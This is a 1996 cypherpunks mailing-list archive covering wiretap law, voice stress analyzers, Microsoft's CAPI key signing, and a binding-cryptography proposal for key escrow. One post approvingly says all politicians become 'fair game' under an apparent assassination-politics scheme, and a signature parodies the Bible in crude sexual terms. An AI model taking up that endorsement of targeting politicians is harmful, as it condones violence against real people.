Uh, well, while I don't doubt the potential use there, my bringing up the 
subject of the voice stress analyzers had nothing to do with AP.  (Remember 
that once AP starts operating, ALL politicians, "honest" and "dishonest" 
will likely be considered fair game.  The way I see it, for each politician 
there will be enough people who will want him out, REGARDLESS of whether 
he's honest.  This makes a lie-detector only marginally useful.)

Rather, I just wanted to point out that the traditional news media is likely 
to be intentionally ignoring the existence of a technology which could 
reveal much about a debate, precisely because such a practice would be 
embarrassing to the politicians.  

(On the other hand it's possible, I suppose, that the inherent stress of 
standing up in front of a crowd, knowing that a few tens of millions of 
citizens were watching, might induce stress having little to do with lying, 
so it wouldn't surprise me if I later heard that this stress-detector really 
doesn't work in such situations.  Even so, I think it would at least have 
been tried before and the "flop" publicized if it had failed.  I don't 
recall if any such attempt has been made, or at least the results weren't 
publicized.  What should we conclude from this?)


>        Dektor's PSE came into some prominence after Col. Bell, then a
>civilian,  showed up with his black box to assist Italian police during
>their huge investigation of the kidnapping of US Army General James Dozier
>by the Red Brigades in '82.  The fact that Dozier was located and rescued
>by the Carabinieri commandos after five weeks in captivity -- while Prime
>Minister Aldo Moro had been murdered by the Red Brigades, eight weeks after
>his kidnapping in '78 -- led inevitably to stories, probably mythical, that
>Bell's PSE was a significant factor in the investigation.  As Clarke or
>someone said, any technology sufficiently advanced will be considered magic
>-- and it is doubtless true that, for many Italians interviewed during the
>Drozier inquiry, the quiet presence of the diminutive American civilian,
>with his utterly mysterious "truth-detector," inspired fear and awe.
>
>        The Legend that came out of Italy was doubtless a factor in
>Dektor's subsequent success selling the $5K PSE into the corporate and
>security market.  (There was a period where corporate negotiations were
>sometimes held in a hotel chosen only just before the start of the talks,
>for fear that one party or the other might have pre-installed a PSE.)   In
>the mid and late '80s, dozens, perhaps hundreds of PIs -- and maybe a few
>journalists -- were actually running around using tape recorders to
>interview people, then running back to their hotel rooms to spin the tape
>for their PSE.


Reminds me...Some states have laws against secretly recording conversations 
in person, even when a telephone line is not involved.  (as I understand it, 
these laws tend to date from the late 1960's, when electronics had shrunk to 
sizes sufficiently small to make body wires/recorders really practical and 
inexpensive.)  This appears highly inconsistent to the "bugging mentality" 
of the police.   My theory is that this apparent contradiction is explained 
when you realize that politicians would be the first, best targets of 
widespread, legal bugging.

After all, even honest lobbyists might want to keep records to show that 
they hadn't violated the law, and to ensure that their recollection of the 
conversation is correct, and to forward these talks to their employers.   
Either "honest" or "dishonest" lobbyists might want to record a politician's 
willingness to accept a bribe, even if one is not offered.  Other 
politicians might want to record negotiations, possibly for later use on the 
campaign trail.  This would be highly unlike most other, ordinary citizens, 
who are rarely going to be in any kind of conversation that is considered 
worth recording!  Add it all up, and you'd probably discover that the 
average Senator or Representative would be recorded in dozens of 
conversations each day, any one of which could pop up at any time on the 
news or, now, the Internet. 

Remember the old saying, "One advantage of telling the truth is that you 
don't have to remember what you said."  Well, for politicians the modern 
corollary is, "One advantage of being an honest politician is that you don't 
have to worry about what the other guy's recording."   But I'll propose that 
by this standard, there are few if any "honest politicians" in Washington!   

Imagine how different a typical (read: typically crooked) politician's life 
would be if everybody had the legal right to record every conversation!





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Oct 1996 11:28:37 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <Pine.SUN.3.94.961008234026.4662B-100000@polaris>
Message-ID: <199610091828.LAA13994@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Unicorn writes:

[challenging wiretap laws]
>And we seasoned lawyers, three of us last I counted, told you that you
>were an idiot for suggesting it.  I guess we hurt your feelings because
>you turned around and asked for a "civilized" lawyer.  (Read: one who will
>listen to your ranting).  You wanted a legal opinion, you got more than
>one. Now go away.

look, I was not going to rub this in your face at all, but you don't
seem to have a clue about this. the fact that you/others here can't 
scrounge enough imagination to come up with an attack against wiretap laws 
based on case law and think such a think is a waste of time
is pretty meaningless in your case. I don't think
you have an imaginative bone in your body, hence the great vitriol
that you unleash upon me whenever I use my own.

from the article just recently posted:

>
>http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=06&art
>icle=BUSINESS2814.dtl
>
>Encryption controversy pits life against liberty

>"Wiretapping is the main issue," said Stewart Baker, former general counsel
>of the National Security Agency, the CIA's code-breaking and eavesdroping
>cousin.

as TCM just pointed out, this is a departure on the part of the administration
in describing the tactics of clipper. clearly, WIRETAPPING AUTHORITY IS
KEY TO CLIPPER LEGITIMACY. hence a legal challenge to wiretapping is an
extremely critical angle to the situation.

>
>"If two criminals are discussing a plot over the telephone and we have a
>wiretap order, the encryption would negate the wiretap," said Michael
>Vatis, a senior Department of Justice official.
>
...

>"For serious investigations involving terrorists or organized crime . . .
>where you're worried about hundreds of people being killed . . . the whole
>point is to keep the investigation secret or the whole thing blows up," he
>said.

as I just recently wrote, it seems to me one of the key points of discussion
that is just now emerging in this debate is the demand by the gov't
that wiretapping be done IN SECRET without knowledge of the suspect,
whereas civil libertarians seem to be challenging this point in particular.
it could be a magic bullet it defeating wiretapping. it seems to really
get to the core of the debate about key escrow etc.

>Not so, argued Daniel Weitzner, an attorney with the civil libertarian
>Center for Democracy and Technology inWashington, D.C. Forgetting
>encryption for a moment, Weitzner said, a wiretap is unlike any other tool
>in the
>investigator's arsenal.
>
>"To get documents sitting on my computer, the FBI has to come into my
>office with a search warrant," Weitzner said. "I have to know about it."

the same distinction again. very interesting.  I was just emphasizing
that in my post.

>
>Exactly the reverse is true for a wiretap. To be effective, the subject
>must be ignorant of the tap. Weitzner said this
>notion of a "secret search" went against a central principle of the Fourth
>Amendment, which protects people from
>unreasonable search and seizure.

whoa, apparently this would be news to Unicorn, who thinks it would be
a waste of time to argue against the established legitimacy of wiretapping
and considers himself a premiere lawyer-dude.  well, I'll just let Unicorn
argue with Weitzner, (whose credentials are rather impressive and I 
trust more, btw..)  I'd be interested to hear what Weitzner says, 
Uni...

so what we have here is a very knowledgeable lawyer who has helped
out EFF argue that wiretaps are unconstitutional based on the precise
aspect that I was focusing on in a post that Unicorn flamed me for:
that they are secret, unknown to the suspect,
and that this thereby might constitute an "unreasonable"
search and seizure. I don't claim to have originated this of course, but
I was emphasizing it in my post, and Unicorn objected.

reading what Weitzner wrote, it is not inconceivable to imagine
him having the position that wiretaps in their present form might
not survive a court challenge, i.e. it would at least not be
a waste of time to mount such a case, as Unicorn belligerently
bellows above is obvious to anyone with a smidgeon of legal
background..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 9 Oct 1996 09:48:23 -0700 (PDT)
To: Ravi Pandya <rpandya@netcom.com>
Subject: Re: Microsoft CAPI
In-Reply-To: <2.2.32.19961009152246.006be444@netcom8.netcom.com>
Message-ID: <325BD6C6.715F@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Ravi Pandya wrote:
> ... You can't load an encryption engine into Windows 95 or 
> Windows NT unless that engine has been specially signed by 
> Microsoft's corporate key.

And so what happens when the Microsoft key is compromised?  It might
be hard to break by purely cryptographic means, but surely there are
some people at Microsoft who aren't millionaires.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 11:39:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610082308.JAA23683@mac.ce.com.au>
Message-ID: <v03007800ae819c18a74b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM -0700 10/9/96, Dale Thorn wrote:

>Why is it that 95-plus percent of all people stay with their parents'
>religion (more-or-less) when they grow up, instead of abandoning it, or
>finding one on their own?  Simple.  The uncountable zillions of "bytes"
>of information that go into your brain before you become more-or-less
>conscious, so controls your mind by the time you are conscious, that
>very few people can overcome this programming to any significant extent.

This is of course not true. Lots of statistics show that nowhere near "95%"
of people stick with the religion they were raised in. In America, at
least. Large numbers become nonbelievers, others become Vegans, Pagans,
Buddhists, Bahaiists, Baalists, etc. This is well-documented and has been
discussed for several decades. I don't know what the current correlation
is, but I'd guess it's less than 50%.

As the old joke goes, what's the surest way to make your kid a nonbeliever?
Send him to a religious school.

Nothing to do with Cypherpunks, but complete errors like this "95%" figure
ought to be corrected, if anybody is still reading this thread.

--Tim May, Acolyte of Baal the Unmerciful






--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Oct 1996 11:54:10 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Government Denial of Service Attacks
In-Reply-To: <3.0b19.32.19961008154059.00a26358@panix.com>
Message-ID: <199610091854.LAA21494@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


DF writes about "GDOS", government-denial-of-service.

you make some very good points that it is impossible for the
government to stamp out activities which it deems illegal
but the public disagrees and flouts. but you don't consider
the situation of harassment. if something should be legal
in a country, it costs the population a lot for it to be
illegal. I don't know if there are government regulators
in NY handling the "illegal apartment" thing, but this
"crime" surely costs the public a lot. 

what is your argument?
that laws against things flouted by the public are meaningless?
the laws have a very tangible effect of harassment upon the 
populace, and in fact the government might assert that 
enforcement is not necessarily the point. it may still be
that there are far fewer of these apartments than there
would be if such a thing was legal (actually, this seems
pretty obvious). the point is, even laws that are only
selectively enforced can be useful to the government. it
is true that imposing an absolute situation like censorship
may be impossible, but that doesn't mean that lack of
absolute enforcement is not useful to the government. as
others (TCM etc) have pointed out frequently, selective enforcement
is a very useful tool in the government arsenal.

in other words, you can't really make the argument that
you seem to be making (as I interpret it), that laws that
don't have good enforcement potential have no value to the
government. they may in fact accomplish exactly what the
government wants. I agree with you that they have poor
social value. the key is trying to get the government
in synch with the population. what you are pointing out 
in the core, I would say, is that a government out of tune
with the population is a society in the midst of a downward spiral.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vitamin@best.com
Date: Wed, 9 Oct 1996 11:46:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: drivers for HP LaserJet
Message-ID: <2.2.16.19961009192219.2e4783ac@best.com>
MIME-Version: 1.0
Content-Type: text/plain



I am looking for drivers for US Robotics  for my HP Laserjet .

I've contacted theU.S. Robotics support via an e-mail. They confirmed that this
driver exists but it is available from BBS only.   

Is there anyway I can access through web or ftp site?

Thanks a mil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 12:45:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Microsoft Millionaires and Billionaires
In-Reply-To: <2.2.32.19961009152246.006be444@netcom8.netcom.com>
Message-ID: <v03007801ae81c0590ebe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 AM -0500 10/9/96, Mike McNally wrote:

>And so what happens when the Microsoft key is compromised?  It might
>be hard to break by purely cryptographic means, but surely there are
>some people at Microsoft who aren't millionaires.

Indeed, not all Microserfs are millionaires. Accessing the URL,
http://microsoft.com/list_of_millionaires, I find that as of the close of
business yesterday, there were 13 non-millionaires at Microsoft. Seven were
part-time janitors, three were in food service, and the remaining three had
no identifiable jobs. (And two of the janitors are expected to become
millionaires any day now.)

And http://microsoft.com/list_of_billionaires reports three on the list.

Glad to be of help.

--Klaus


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Wed, 9 Oct 1996 13:09:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Microsoft CAPI
In-Reply-To: <2.2.32.19961009152246.006be444@netcom8.netcom.com>
Message-ID: <v03007800ae81c43a7a63@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally <m5@tivoli.com> writes:
>Ravi Pandya wrote:
>> ... You can't load an encryption engine into Windows 95 or
>> Windows NT unless that engine has been specially signed by
>> Microsoft's corporate key.
>
>And so what happens when the Microsoft key is compromised?  It might
>be hard to break by purely cryptographic means, but surely there are
>some people at Microsoft who aren't millionaires.

But who may want to be, eh?  :)

Actually it is also possible to use a much more overt route and just
patch around anything which is doing the signature checking (possibly
on just a temporary basis if the checks are only made when the engine
is first loaded.)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Wed, 9 Oct 1996 10:17:01 -0700 (PDT)
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <2.2.32.19961009171834.0068ebb4@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:04 AM 10/9/96 -0700, you [Paul S. Penrod] wrote:
:

:I suggest you [Alan Olsen] RTFM again. It was a commentary on the sad state of 
:scientific practice as germain to today's egomanical pirannah who inhabit 
:the domain of the "scientist". To publish is to exist, and the first rule 
:is "draw your curves, then plot your points." The second is "Thou shalt 
:not critisize your mentor."
:
:Save the anti-religion rhetoric for someone who gives a damn.
:
:...Paul


Well, Paul, obviously you do. Otherwise why try to justify some thinly
disguised pseudo-scientific mumbo jumbo as "a commentary on the sad state of
scientific practice."

As Alan said, "I suggest you take your beliefs to talk.origins."

BTW, what DOES this have to do with crypto, or privacy, or personal
freedoms, or MORMONS for that matter?

Alec





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Wed, 9 Oct 1996 11:42:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Netscape does the right thing
Message-ID: <v03010300ae819dfddaed@[206.151.234.126]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

When you buy Que's current Netscape book (_Special Edition, Using Netscape
3_), the included CD has the US-only, 128-bit, non-export version of
Navigator on it. It's a licensed copy, even! (Of course, the book also has
a small yellow "NOT FOR EXPORT" tag on the back cover, but who's counting?)

For $49, getting a licensed copy of the 128-bit Navigator 3.0 plus a 1000+
page book is a pretty good deal. My hat's off to Netscape for choosing to
put the 128-bit version on the CD, and to Macmillan/Que for bothering to
get the software in the first place. I really do believe that Netscape
wants to get secure software out as widely as possible.

(Disclaimer: I wrote chapter 29 (the intro to JavaScript chapter) for
_Special Edition, Using Netscape 2_. Que reused it, but I don't get paid
any extra. It's a comprehensive book, and the CD has lots of cool stuff on
it too.)

- -Paul
-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b3

iQEVAwUBMlvuQkp5FfADoAyJAQGpqQgAmkLHxKaVxdghoQy84ChCegj8FKBhXpvs
eHFefwTBydaf1VD8ixDGdygy1Ch2Na0//y0hC8xF3gHg+/uTxbTh5Z+V+/0ISlu9
qsyoZMfda8AnMlEDF/PdNgONp2/E/+BguYcp9044RgPCVIVEH8cN9ff97QzUIOk1
VjR0hYnG98UYDmvEop/509VUDPvokbFLHG4iXl//3uTtY2sOuNG8zWNAV9SApGBM
6aOBS8+gW9DTGzlOTUlR5ncFSji9a4jJv2XkXsIin/v1MTjxooYn5ISrC+/jo2iT
vmDtlk7y5k1SzzWkP0JtSM0ZbjV5xMyb4wNyRQfH7LIpUJ9uqpdKdg==
=p0Ej
-----END PGP SIGNATURE-----

--
Paul Robichaux		LJL Enterprises, Inc.
paul@ljl.com		Be a cryptography user. Ask me how.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 9 Oct 1996 14:05:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jewell shows warrants are frauds
Message-ID: <199610092105.OAA15129@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


There was yet another item on Richard Jewell today on the national news.  If 
our goal is to return this country to allowing the government to do only the 
"reasonable" searches that the Constitution allows, we shouldn't miss the 
opportunity to take the Jewell case and shove it up their...well...use it to 
our best advantage.

The _theory_ is that the only way the government could have gotten a warrant 
against Richard Jewell ONLY by showing some likelihood that evidence of the 
crime would be found.  The facts, the end result is quite the opposite; the 
FBI has had a full opportunity to do their investigation and they've 
found...nothing.  Or, at least nothing they're now willing to leak.  
Nothing, certainly, which they feel justifies filing charges.

So they're probably going to just drop the investigation of Jewell.  But at 
this point, we should consider that practically an engraved invitation:  The 
theory behind ALL warrants is that they are granted only upon a showing to a 
judge of a legally satisfactory reason to grant the warrant.  Given the 
outcome, it is almost certain that no such showing ever occurred.  What 
happened, on the other hand, was probably just another fraud.  Some 
prosecutor or investigator did some magic dance in front of a judge, 
pretending to tell the truth, and the judge pretended to believe him.  The 
difference with this case, however, is that a few hundred million people 
heard about it.  That's why this case, unlike nearly all others, presents a 
marvelous opportunity.

All of the various Clipper/GAK proposals are based, ultimately, on the same 
weakness:  The idea that we, the people should be able to trust some 
overpaid government-thug-sympathizer in a black robe to decide whether or 
not a given set of evidence is sufficient to decide to grant a warrant.  
Perhaps the best challenge to this idea is to show a clear example of how 
the system fails, precisely when it's expected to WORK!

The Jewell incident is a good test-case, if for no other reason that it was 
highly publicized and many if not most people know the basics.  In addition, 
unlike a case which was thought insignificant before and only later became 
well-known, all of the officials who had anything to do with it were, 
presumably, fully aware how important it was and could be expected to be "on 
their toes" about ensuring that they do their jobs correctly.

Quite simply, the authorities had every reason to get this one RIGHT, as 
opposed to getting it wrong.  They got it wrong.  We should insist that the 
details of this disaster be exposed to show them for the lying frauds they are.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 9 Oct 1996 14:32:23 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Creative Wiretap Arguments [Was :Re: Put up or shut up]
Message-ID: <199610092130.OAA16970@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:37 AM 10/9/96 -0400, Black Unicorn wrote:
>On Tue, 8 Oct 1996, jim bell wrote:
>> Maybe you're missing the point?  Even if you accept the idea of wiretapping 
>> telephone lines, one of the things that _isn't_ settled is how law is going 
>> to start treating ISP's.  That, let me point out, IS NOT settled law, and 
in 
>> fact it hasn't really even started, so those lawyers who have a knee-jerk 
>> tendency to accept precedent don't have any precedent to accept!  (unless, 
>> of course, they "pre-accept" the assumption that what the government can do 
>> WRT ISP's is somehow identical to what they do with telephones.)
>
>I disagree.  There is lots of potential precident.  The entire concept
>that data voluntarily turned over to a 3rd party is not entitled to 4th
>amendment protection (i.e., pen registers) is just the one that happens to
>jump to mind. 

Given that the "constitutionality" of pen registers is pretty intimately 
tied up with the ADMITTEDLY illegal usage of wiretaps before 1968, that 
hardly qualifies as a settled issue.  (I say this from the standpoint of 
"what really oughtta be" rather than "what those nine morons will accept.")

BTW, it is unclear why this argument ("data voluntarily turned over to a 3rd 
party") couldn't "automatically" be applied to telephone audio itself.  
After all, in order to get the audio to the other end, you have to convert 
it into varying electical signals, which are "turned over to a 3rd party", 
the telephone company.
The distinction between these two forms of information is pretty flimsy. 
(Chances are excellent that the only reason for any distinction between them 
at all originated back before 1968, when wiretaps themselves were considered 
illegal, and the cops wanted to be able to justify what they probably called 
a "minimal" violation of privacy short of being able to hear the audio 
itself.  Now that the wiretaps themselves are called "legal" I suspect that 
the cops will have reverted to the assertion that this information is 
essentially identical from a warrant standpoint.)

Another possibility is that this is simply a holdover from the time when 
automated switching of telephone lines was essentially unknown:  To make a 
telephone call, you "had to" tell the operator the number you were calling, 
and thus presumably you'd "voluntarily" turned it over.  However, that 
presumption evaporated once automated switching took over, and there's no 
requirement that the telephone switch makes a permanent record of any given 
phone call.

"Naturally," the cops would have argued that the advance of technology 
(automatic switching) would "make futile law-enforcement access" (much as 
they are now claiming the advance of encryption will do) and would have 
argued that the new technology shouldn't prevent them from knowing who is 
making phone calls to whom.

Isn't it interesting that when an advance in technology allows the cops to 
do something they hadn't been able to do before, they accept it as if it's a 
done deal, whereas when technology starts taking away an ability they howl 
"like a stuck pig."  Sounds pretty selfish to me.


> The fact that the government has had to deal with
>the breakup of ma bell and cooperate with several different phone
>companies now suggests to me that not much of a leap is required to
>include ISPs.  Constitutional arguments that ISPs are somehow different
>from phone companies and therefore not required to comply with wiretap
>orders?  Good luck.

All of which are still monopolies, at least in their defined areas of 
business.  And customers have no choice of who to deal with, as a result.  
Thus, phone companies never had any motivation to satisfy their customers by 
fighting wiretap warrants in court.  Etc.   ISP's are not monopolies, they 
are not common carriers, etc.  ISP's, quite simply, are entitled to write 
their OWN rules about how they deal with customers.  One the whole, I'd say 
there are plenty of differences between a plain-vanilla telephone company 
and an ISP.



>I know its fun to make the argument that ISPs and E-mail and NetPhone are
>all new technologies and so it must be unconstitutional to regulate them
>but the amusement in these cases stems from a wish that it was so, not
>fact or reason.

I didn't mention, "unconstitutional";  it's possible that it's simply 
"illegal", as in, "there's no law yet which allows "ISP-tapping."  In the 
same sense as wiretapping was illegal before 1968.

BTW, I'm not saying that "normal" wiretapping can't be done on an ISP.  In 
other words, arguendo the cops would only be entitled to connect to the 
phone line(s), as in an ordinary wiretap.  But that might be pretty damn 
ineffective, given that even a typical small ISP probably has a hundred or 
more phone lines to monitor.  In other words, there's no single point where 
the cops can clip on the clip leads and get the data they want.

Which raises the issue, "Is the ISP required to install 'wiretap-friendly' 
capability?"  Apparently not, if the cellular phone industry is any 
precedent:  For awhile, cops couldn't easily tap cell phones because no such 
capability had been designed into the cell-site software.  Such an omission 
was not considered a violation of law.



>> I contend that an ISP should be entitled to enter into a contract with his 
>> customers in a way which obligates him to structure his business to 
minimize 
>> his ability to cooperate with police when given a search warrant.
>
>"I content that a phone company should be entitled to enter into a
>contract with his customers in a way which obligates him to structure his
>business to minimize his ability to cooperate with police when given a
>search warrant."  Yeah.  Good luck. 

It looks like you're not very perceptive.  Notice I said "minimize his 
ability to cooperate."  As far as I'm aware, telephone companies are not 
required to keep many of the records they currently keep.  If they contract 
with a customer to not keep those records, the inability of the cops to get 
those records is not any sort of violation of law.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 9 Oct 1996 06:01:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Binding cryptography - a fraud-detectible alternative to key-esc
Message-ID: <736E4C76D98@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


In this message, we introduce binding cryptography, a new proposal for
establishing an information security infrastructure that does not
hamper law enforcement. We present an alternative that can give
law-enforcement agencies access to session keys, without users having
to deposit private keys. Unilateral fraud in this scheme is easily
detectible. We outline the proposal below, and announce two articles
which will describe the proposal in more detail and which will provide
the legal and the technical context.

The text is also available at
http://cwis.kub.nl/~frw/people/koops/binding.htm.

9 October 1996
Eric Verheul, everheul@ngi.nl
Bert-Jaap Koops, koops@kub.nl
Henk van Tilborg, henkvt@win.tue.nl

-------------------------------------------

(c) 1996 Eric Verheul, Bert-Jaap Koops, Henk van Tilborg
This message may only be redistributed in its entirety and with
inclusion of the copyright notice. Credit if quoting.

_Binding Cryptography, a fraud-detectible alternative to key-escrow
proposals_

_1. Introduction_
Information security, and so cryptography, is essential in today's
information society. A robust (information) security infrastructure
must be set up, including a Key Management Infrastructure. However,
the unconditional use of encryption by criminals poses a threat to law
enforcement, a problem that is hard to solve. Consequently,
governments have two tasks. The first is stimulating the establishment
of a security structure that protects their citizens, but which does
not aid criminals. The second task is coping with the use of
encryption by criminals outside of this framework. We think that
encryption outside of the framework (e.g., PGP) should not be outlawed
- but it need not be mainstream either. It is crucial that any such
established security structure is widely accepted and trusted, as this
will lower the demand for encryption outside of this framework, and so
will make the second goal easier to achieve (or, at least, not more
difficult). The establishment of such a widely accepted and trusted
security structure is now the challenge that (US) IT businesses face
if they want to participate in the recent CLIPPER IV initiative.

_2. Binding cryptography_
In a series of two articles, we address the establishment of an
information security infrastructure. Several proposals have been made
by governments and others to establish such an infrastructure, but a
satisfactory overall solution remains yet to be found. In the
non-technical article [VKT], we review several technical proposals and
a few government initiatives, focusing on key-escrow proposals. We
present a series of criteria that acceptable solutions should meet,
and note that all proposals so far fail to meet many of these
criteria. We argued that the establishment of a worldwide security
infrastructure can not be achieved without strong cooperation of
governments. In fact, governments themselves should take up the
challenge of establishing a security infrastructure, based on
public-key encryption, which does not hamper law enforcement. We offer
a new solution to achieve this: "binding data", which also improves
upon current proposals. It has the advantage that it helps the
establishment of a strong security infrastructure which discourages
abuse for criminal or subversive purposes by making unilateral abuse
easily detectible. It allows a straightforward monitoring of
compliance with law-enforcement regulations, without users having to
deposit ("escrow") keys beforehand. Thus, an information security
infrastructure can be established, which does not worsen the crypto
problem for law enforcement.

Metaphorically speaking, our solution consists of equipping public-key
encryption systems used for confidentiality with a (car) governor (a
speed-limiting device). The specifications of this governor are rather
general, and so many systems can probably be equipped with them. It is
inspired by the proposal of Bellare and Rivest [BR], in which users'
encrypted messages consist of three components:
1. the (actual) message encrypted with any symmetric system, using a random session
key; 
2. the session key encrypted with the public key(s) of the addressee(s);
3. the session key encrypted with the public key of a Trusted Retrieval Party (TRP).

In effect, the TRP is treated as a virtual addressee, although the
message is not sent to it. When a law-enforcement agency is conducting
a lawful intercept and strikes upon an enciphered message, they take
the third information component to the TRP. If shown an appropriate
warrant, the TRP decrypts the information component and hands over the
session key, so that the law-enforcement agency has access to the
message. Observe that users are not obliged to escrow their (master)
keys, they only give access to the (temporary) session keys used in
the communication. The concept of "virtual escrow" has been the base
of several escrow products (AT&T Crypto, RSA Secure, TIS Commercial
Key Escrow).

The main drawback of this concept is that it offers no possibility, at
least for others than the TRP, to check whether the third component
actually contains the (right) session key; moreover, the TRP will only
discover fraud after a lawful wiretap. This renders the solution
almost entirely unenforceable.

Therefore, we propose a binding alternative, which adds a fourth
component to the encrypted message: 
4. binding data.

The idea is that any third party, e.g., a network or service provider,
who has access to components 2, 3 and 4 (but not to any additional
secret information) can: 
a. check whether the session keys in components 2 and 3 coincide; 
b. not determine any information on the actual session key.

In this way, fraud is easily detectible: a sender that attempts to
virtually address a session key to the TRP (component 3) that is
different from the real one he uses on the message (or just nonsense)
will be discovered by anyone checking the binding data. If such
checking happens regularly, fraud can be properly discouraged and
punished. The binding concept supports the virtual addressing of
session keys to several TRPs (or none for that matter), for instance,
one to a TRP in the country of the sender and one in the country of
the addressee. The solution therefore offers the same advantage for
worldwide usability as the Royal Holloway [Holl] concept. We also
remark that the concept supports the use of controllable key splitting
in the sense of Micali [Mica] as well: a sender can split the session
key and virtually address all the shares separately to the addressee
and various TRPs using the binding concept. Moreover, the number of
shares and the TRPs can - in principle - be chosen freely by each
user. Finally we remark that the time-boundedness conditon (the
enforceability of the timelimits of a warrant) can be fulfilled by
additionally demanding that encrypted information (or all components)
be timestamped and signed by the sender; a condition that can be
publicly verified by any third party (e.g., monitor) as well.

A PKI that incorporates binding data hence has the following four
players: 
- Users, i.e., governments, businesses, and citizens, 
- TTPs offering trusted services (e.g., time-stamping and certification of
public keys), 
- TRPs aiding law-enforcement agencies with decrypting legally intercepted messages, 
- Monitors, monitoring communications encrypted via the PKI on compliance with 
binding regulations. For instance, these could be network operators or (Internet) service
providers.

In [VKT], we explain how we envision the framework in which the
binding concept could present a security tool in the information
society. We think the concept is flexible enough (e.g., in the choice
of TRPs) to be incorporated into almost any national crypto policy, on
both the domestic and foreign use of cryptography.

In a mathematical paper [VT], Verheul and Van Tilborg propose a
technical construction for binding data for an important public-key
encryption system: ElGamal. This construction is compatible with
Desmedt's [DESM] traceable variant of ElGamal. The construction is
based on the techniques used in zero knowledge proofs. We expect that
these constructions can be improved and that various other public-key
encryption systems can be equipped with binding data. We present this
as a challenge to the cryptographic research community.

An outline of the mathematical construction of binding ElGamal can be
found at http://cwis.kub.nl/~frw/people/koops/bindtech.htm.


_3. References_

[BR]	
M. Bellare, R.L. Rivest, "Translucent Cryptography. An Alternative to
Key Escrow, and its Implementation via Fractional Oblivious Transfer",
see http://theory.lcs.mit.edu/~rivest

[Desm]	
Y. Desmedt, "Securing Traceability of Ciphertexts - Towards a Secure
Key Escrow System", Advances in Cryptology - EUROCRYPT'95 Proceedings,
